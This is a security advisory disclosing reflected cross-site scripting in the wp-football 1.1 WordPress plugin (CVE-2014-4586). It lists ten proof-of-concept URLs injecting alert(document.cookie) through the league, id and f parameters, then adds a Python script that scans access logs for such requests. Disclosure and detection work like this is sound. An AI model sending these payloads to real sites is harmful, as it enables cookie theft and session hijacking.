Wp Plugin Wp Football

Plugin Details

Plugin Name: wp-plugin : wp-football
Affected Version : 1.1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4586
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-content/plugins/wp-football/football_classification.php?league=league">alert(document.cookie)&group=group

http://localhost/wp-content/plugins/wp-football/football_criteria.php?league=league'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football-functions.php?ajax=1&id_group=id_group&id_league=id_league&f=f'>alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_groups_list.php?action=action&paged=paged&id=id">alert(document.cookie)&byajax=byajax

http://localhost/wp-content/plugins/wp-football/football_matches_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football_matches_load.php?action=delete&paged=paged&id_group=id_group&id_league=id_league">alert(document.cookie)&id_phase=id

http://localhost/wp-content/plugins/wp-football/football_matches_phase.php?action=action&paged=paged&id=id">alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_phases_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_default_preview.php?league=league">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_worldCup_preview.php?league=league">alert(document.cookie)&

 

Vulnerable Parameters : league, id, f
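
Log review for the requests listed above, as an added example that is not part of the original advisory or the plugin's code: it flags access-log entries that hit a wp-football script with a quote or angle bracket in the league, id or f parameter. The combined log format, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path prefix and parameter names come from the advisory above.
PLUGIN_PREFIX = "/wp-content/plugins/wp-football/"
VULNERABLE_PARAMS = {"league", "id", "f"}
# Characters that let a reflected value break out of an HTML attribute or tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return sorted advisory parameter names whose decoded value holds a breakout character."""
    parts = urlsplit(target)
    if not unquote(parts.path).startswith(PLUGIN_PREFIX):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name in VULNERABLE_PARAMS and BREAKOUT.search(unquote(value)):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Yield (line_number, request_target, parameter_names) for entries worth reviewing."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        params = suspicious_params(match.group(1)) if match else []
        if params:
            yield number, match.group(1), params


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2014:10:00:00 +0000] "GET /wp-content/plugins/wp-football/football_criteria.php?league=3 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jul/2014:10:00:05 +0000] "GET /wp-content/plugins/wp-football/football_criteria.php?league=league%27%3Ex HTTP/1.1" 200 540',
    '192.0.2.12 - - [01/Jul/2014:10:00:09 +0000] "GET /wp-content/plugins/wp-football/football_groups_list.php?action=a&id=id%2522%253Ex HTTP/1.1" 200 530',
    '192.0.2.13 - - [01/Jul/2014:10:00:12 +0000] "GET /index.php?id=%22%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, target, params in scan(SAMPLE_LOG):
        print(f"line {number}: {params} in {target}")
```

A hit only shows that a request carried markup-breaking characters in one of the reported parameters; whether the response reflected them still has to be checked against the installed plugin version.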